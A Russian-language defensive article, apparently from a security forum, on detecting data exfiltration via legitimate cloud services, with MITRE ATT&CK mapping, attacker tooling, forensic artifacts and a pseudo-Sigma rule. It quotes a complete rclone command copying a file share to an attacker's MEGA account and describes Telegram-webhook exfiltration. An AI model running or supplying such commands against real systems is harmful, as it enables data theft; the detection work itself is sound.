По данным BlackFog (цитируется в обзоре Vectra AI за 2024 год), 93% атак с развёртыванием ransomware включали предварительную эксфильтрацию данных - злоумышленники крали информацию до шифрования. Медианное время от компрометации до начала вывода данных, согласно Unit 42 Incident Response Report, сократилось до двух дней, а в каждом пятом инциденте данные уходили в первый час.
При расследовании одного из таких кейсов я обнаружил, что вся скрытая эксфильтрация данных через облачные сервисы прошла штатным HTTPS к
api.dropboxapi.com - тому самому эндпоинту, куда финансовый отдел ежедневно синхронизирует квартальную отчётность. Ни NGFW, ни прокси, ни DLP не подняли ни одного алерта. Трафик был технически неотличим от легитимного. Вот с этого момента стоит разбираться - почему так получается и что с этим делать.Бизнес-логика cloud exfiltration: зачем атакующему ваш OneDrive
Прежде чем разбирать артефакты и детекты, разберёмся с экономикой атакующего. Почему APT-группы и ransomware-операторы предпочитают облачные хранилища собственным серверам для вывода данных? Подробнее - в нашем материале про мисконфигурация облака атаки.Маскировка в легитимном трафике. Организация, где сотрудники работают с OneDrive, Dropbox или Google Drive, генерирует тысячи запросов к API этих сервисов ежедневно. Добавить к потоку ещё несколько сотен мегабайт - как спрятать каплю в океане. Firewall видит HTTPS к
graph.microsoft.com или content.dropboxapi.com и пропускает без вопросов: домен в allow-list.Нет своей инфраструктуры - нет проблем. Поднимать и поддерживать C2-сервер - это затраты и риски: IP попадает в threat intelligence фиды, домен заблокируют, сервер изымут правоохранители. Облачное хранилище бесплатно, не требует администрирования и почти не оставляет следов, привязанных к инфраструктуре атакующего.
Скорость и масштаб. По данным CrowdStrike Global Threat Report 2025, число cloud intrusions выросло на 26% год к году (2024 vs 2023). Облачные API поддерживают параллельные потоки передачи - Rclone, например, по умолчанию использует четыре параллельных transfer-потока и умеет ограничивать bandwidth, чтобы не вызвать аномалию по объёму.
Вся эта логика укладывается в концепцию Living off the Cloud (LOLC) - аналог Living off the Land, но на уровне облачной инфраструктуры. Атакующий не приносит ничего подозрительного: он использует те же сервисы, тот же HTTPS и тот же порт 443, что и защитники. Именно поэтому cloud exfiltration техники сложнее детектировать, чем классические C2-каналы к подозрительным IP.
MITRE ATT&CK: карта техник облачной эксфильтрации
Кража данных через легитимные облачные сервисы покрывается несколькими техниками MITRE ATT&CK. Разберу каждый вектор отдельно.T1567.002 - Exfiltration to Cloud Storage (тактика Exfiltration). Основная техника: данные выгружаются в облачное хранилище вместо передачи по выделенному C2-каналу. Согласно MITRE ATT&CK T1567.002, её применяют десятки зафиксированных групп: Akira и Ember Bear используют Rclone для выгрузки на mega.nz; APT41 DUST отправляет собранные данные на OneDrive; HAFNIUM и FIN7 эксфильтрируют на MEGA; Scattered Spider работает с MEGA, SnowFlake и AWS S3-бакетами; Storm-0501 комбинирует Rclone, MegaSync и AzCopy CLI; Lazarus Group применяет кастомную сборку утилиты dbxcli для Dropbox.
T1567.004 - Exfiltration Over Webhook (тактика Exfiltration). Данные уходят через webhook-эндпоинты легитимных сервисов - Slack, Discord, Telegram Bot API. Вместо файлового хранилища используется messaging API, что дополнительно затрудняет обнаружение эксфильтрации данных: трафик к
api.telegram.org или hooks.slack.com выглядит как обычное корпоративное общение.T1537 - Transfer Data to Cloud Account (тактика Exfiltration). Данные перемещаются из облачного аккаунта организации в аккаунт, контролируемый атакующим - например, из корпоративного Azure-тенанта в персональный. Этот вектор особенно неприятен: передача cloud-to-cloud может вообще не проходить через сетевые сенсоры организации. Вы просто не увидите трафик.
T1530 - Data from Cloud Storage (тактика Collection). Этап перед эксфильтрацией: атакующий собирает данные из облачных хранилищ жертвы - SharePoint (T1213.002), S3-бакетов, Azure Blob Storage. Часто реализуется через скомпрометированные OAuth-токены или украденные credentials облачных учётных записей (T1078.004 - Cloud Accounts).
T1102 - Web Service (тактика Command and Control). Легитимные веб-сервисы используются как C2-канал. Когда один и тот же Dropbox или OneDrive служит одновременно для C2 и эксфильтрации - обнаружение усложняется многократно: весь вредоносный трафик идёт к одному доверенному домену.
Ключевое наблюдение, которое часто упускают: эксфильтрация - не изолированный шаг. Ей предшествует сбор данных (T1530) и установление канала управления (T1102). Детектировать эксфильтрацию на этапе самой передачи - уже поздно. Эффективное обнаружение эксфильтрации данных начинается на этапе collection.
Инструменты кражи данных через облако: Rclone, WinSCP и cURL
По данным ReliaQuest (анализ инцидентов с сентября 2023 по июль 2024), три инструмента доминируют в реальных кейсах data theft через облако.Rclone: 57% инцидентов
Rclone - open-source CLI-утилита для синхронизации файлов с облачными провайдерами. В легитимных сценариях её используют для бэкапов и миграции данных. Для атакующих привлекательна по нескольким причинам: поддержка десятков провайдеров (Google Drive, Amazon S3, MEGA, Dropbox, Wasabi, Azure Blob), кроссплатформенность (Windows, Linux, macOS), контроль bandwidth через--bwlimit и параллельные потоки передачи через --transfers и --multi-thread-streams.Конкретный пример из MITRE ATT&CK (кампания C0015):
Код:
rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M
--max-age 2y фильтрует файлы моложе двух лет (актуальные документы ценнее), --bwlimit 10M ограничивает скорость до 10 МБ/с для маскировки под нормальный трафик, -q подавляет вывод в консоль. Семь параллельных потоков обеспечивают высокую скорость при контролируемом сетевом профиле. Обратите внимание - атакующий не берёт всё подряд, а фильтрует по возрасту. Продуманный подход.Согласно ReliaQuest, атакующие часто переименовывают бинарник Rclone (masquerading) - в
svchost.exe или backup.exe - для обхода статических детектов. В одном из расследованных ими инцидентов Rclone был замаскирован под стандартный системный процесс и успешно эксфильтрировал данные на Dropbox в рамках double-extortion атаки. Тот же отчёт связывает Rclone с группами LockBit, Black Basta и Blacksuit.WinSCP и cURL
WinSCP - GUI/CLI-утилита для файлового трансфера по SFTP/SCP/FTP. Отличается от Rclone графическим интерфейсом и ориентацией на передачу файлов на конкретный удалённый хост, а не в облачное хранилище. Сисадмины пользуются ей постоянно, поэтому её появление в логах не вызывает подозрений у SOC-аналитика без дополнительного контекста.cURL - стандартная утилита для HTTP-запросов. Согласно MITRE ATT&CK T1567.002, Mustang Panda применяла
curl для эксфильтрации архивов на облачные сервисы. cURL предустановлена на большинстве Linux-систем и на Windows начиная с версии 10 1803, что делает её идеальным LOLC-инструментом: не нужно ничего скачивать, бинарник уже на хосте.Помимо CLI-утилит, атакующие используют API мессенджеров. Как описывает журнал «Хакер», отправка файла через Telegram Bot API - это один POST-запрос к
api.telegram.org/bot<TOKEN>/sendDocument, и для этого достаточно Python в три строки.Нетипичные инструменты
ReliaQuest фиксирует рост использования нетипичных инструментов: MegaSync (официальный клиент MEGA), Restic (утилита для бэкапов), FileZilla и RMM-софт (Remote Monitoring and Management), который применяют группы вроде Inc Ransom. Cisco Talos в своём Exfiltration Framework подчёркивает: «cloud-native tools blend into normal operations» - облачные клиенты сливаются с легитимной активностью. Блокировка по имени процесса тут не работает - нужен контекст запуска.Forensic-артефакты скрытой эксфильтрации данных
Обнаружение скрытой передачи данных через SaaS и облачные хранилища требует корреляции сигналов из трёх источников: endpoint-телеметрия, сетевые логи и cloud audit logs. Один источник в изоляции недостаточен. Cisco Talos (Exfiltration Framework, март 2025) формулирует это прямо: «reliable detection requires correlation across endpoint, network, and cloud telemetry, with emphasis on behavioral baselining».Endpoint
Что искать на скомпрометированном хосте:- Parent-child отношения процессов. Rclone, запущенный через
powershell.exe -enc ...с parent processwmiprvse.exe- аномалия. Легитимный Rclone обычно стартует из планировщика задач или интерактивной сессии пользователя. Cisco Talos отмечает, что execution context - часто более стабильный индикатор, чем наличие конкретного бинарника. - Путь запуска. Rclone из
C:\Users\Public\,C:\ProgramData\или%TEMP%вместо стандартного пути установки - красный флаг. - Конфигурационные файлы. Rclone создаёт
rclone.confс credentials и настройками подключения к провайдеру. Поиск этого файла, его MFT-записей или Prefetch-артефактов - один из первых шагов при расследовании. - Предшествующее архивирование. Запуск
7z.exe,tarилиrar.exeс последующим обращением к облачным эндпоинтам - типичная цепочка staging → exfiltration. Видишь7z a -pперед HTTPS кmega.nz- дело плохо.
Сетевые сигналы
Основная проблема - трафик зашифрован и идёт к легитимным доменам. Но кое-что вытянуть можно:- Объём исходящего трафика. Baseline пользователя - 200 МБ/день к OneDrive. Внезапно 15 ГБ за ночь - аномалия. Cisco Talos подчёркивает: надёжная детекция требует cumulative transfer analysis (суммарный объём за период), а не порогов на отдельные HTTP-сессии.
- Нехарактерные облачные эндпоинты. Организация использует OneDrive и Google Drive, но в DNS-логах появляется трафик к
mega.nzилиwasabi.com- сигнал, который CASB или DNS-мониторинг должны перехватить. По данным MITRE ATT&CK T1567.002, MEGA - один из самых популярных сервисов для эксфильтрации: его используют HAFNIUM, FIN7, Scattered Spider, Storm-0501 и другие. - Временные паттерны. Эксфильтрация в нерабочие часы - классический индикатор. Но продвинутые группы специально выполняют передачу в рабочее время, так что полагаться только на это нельзя.
Cloud Audit Logs
Для Microsoft 365 / Azure: операцииFileDownloaded, FileSyncDownloadedFull в Unified Audit Log с аномальным количеством файлов за сессию; входы с необычного IP или устройства в Azure AD Sign-In Logs, за которыми следует массовый доступ к SharePoint/OneDrive; запросы к Microsoft Graph API (/me/drive/root/children) с пагинацией и скачиванием больших объёмов.Для AWS: события
GetObject к S3 с нехарактерного IP или события PutObject в неизвестный бакет в CloudTrail; аномальный объём исходящего трафика в VPC Flow Logs.Детектирование аномального облачного трафика: от baseline к правилам
Подход к обнаружению cloud exfiltration строится не на сигнатурах конкретных инструментов - они меняются и маскируются - а на поведенческих аномалиях.Baseline: три измерения нормы
Перед построением правил нужен baseline. Без него вы слепы:- Объём данных к каждому облачному провайдеру - per-user, per-day, с учётом роли. Разработчик, выгружающий сборки на S3, и HR-менеджер, работающий с OneDrive, генерируют принципиально разный трафик.
- Используемые облачные сервисы - whitelist провайдеров на уровне DNS и прокси. Появление нового провайдера (MEGA, pCloud, Wasabi) - событие, требующее разбора.
- Временные окна активности - когда конкретный пользователь обычно работает с облаком. Активность аккаунта финансового аналитика в 3:00 ночи - повод для проверки.
Детекционные сигналы высокого приоритета
На основе данных Cisco Talos Exfiltration Framework и MITRE ATT&CK:- Процесс из нестандартной директории выполняет HTTPS POST/PUT к cloud storage API
- Архиватор (
7z,rar,tar) запускается с последующей передачей результата к облачному эндпоинту - Бинарник с характерными CLI-аргументами Rclone (
--transfers,--bwlimit,copy) стартует вне контекста запланированных задач - Новый облачный провайдер появляется в DNS-логах организации
- Массовый доступ к файлам в SharePoint/OneDrive (>100 файлов за час) с последующим ростом исходящего трафика
Пример детекционной логики
Для выявления подозрительного запуска Rclone или его замаскированных вариантов:
Код:
# Псевдо-Sigma: детекция Rclone masquerading
# Ищем характерные CLI-аргументы вне легитимных путей
detection:
selection_args:
CommandLine|contains|all:
- '--transfers'
- 'copy'
filter_legit_path:
Image|startswith:
- 'C:\Program Files\rclone\'
- '/usr/bin/rclone'
condition: selection_args AND NOT filter_legit_path
mega.nz или api.dropboxapi.com - confidence алерта существенно возрастает.Важный нюанс из исследования Cisco Talos: «stealth is often a function of policy, not tooling». Скрытность эксфильтрации определяется не столько инструментом, сколько тем, насколько в организации настроены политики доступа к облачным сервисам и насколько гранулярно ведётся мониторинг. По-русски: если у вас нет whitelist облачных провайдеров - любой оператор Akira скажет спасибо.
Практический workflow: от алерта до подтверждения эксфильтрации
📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме
Большинство организаций, с которыми я работал при расследовании APT-кейсов с облачной инфраструктурой, спотыкаются на шаге 2 - у них просто нет baseline. Без исторических данных о нормальном трафике к облачным сервисам аналитик не может отличить аномалию от нормы. Это не проблема инструментов - SIEM и EDR есть почти у всех. Это проблема процесса: никто не тратит две недели на сбор и нормализацию baseline до того, как инцидент случится.
На бумаге формула понятна: baseline → deviation → alert → triage. Но decay по-настоящему ощущается только когда прогоняешь это на реальных логах с шумом от бизнес-процессов. На HackerLab.pro можно потренироваться в категориях forensics и network - готовые стенды дают возможность разобрать артефакты без риска для прода.
Неудобная правда: периметровая защита - NGFW, DLP, прокси - против LOLC-атак работает плохо. Не потому что продукты слабые, а потому что задача «отличить легитимный
rclone copy бэкап-инженера от rclone copy оператора Akira» не решается на уровне сигнатур. Оба трафика идут на один домен, по одному протоколу, с одного хоста. Решение - только в контексте: кто запустил, откуда, в какое время, после каких действий. А контекст требует корреляции endpoint + network + cloud logs в одном месте, в реальном времени, с baseline под каждую роль. Из всех организаций, где я вёл расследования за последние два года, baseline облачного трафика per-user был настроен может быть в одной из пяти. Остальные обнаруживали эксфильтрацию постфактум - когда данные уже появлялись на leak-сайте ransomware-группы. CASB-решения становятся зрелее, XDR-платформы учатся коррелировать облачную телеметрию - но разрыв между теорией и практикой детектирования аномального облачного трафика остаётся огромным. Если интересно как другие команды строят детекты под эту группу TTP - на форуме codeby.net обсуждаем подобные кейсы и делимся Sigma-правилами.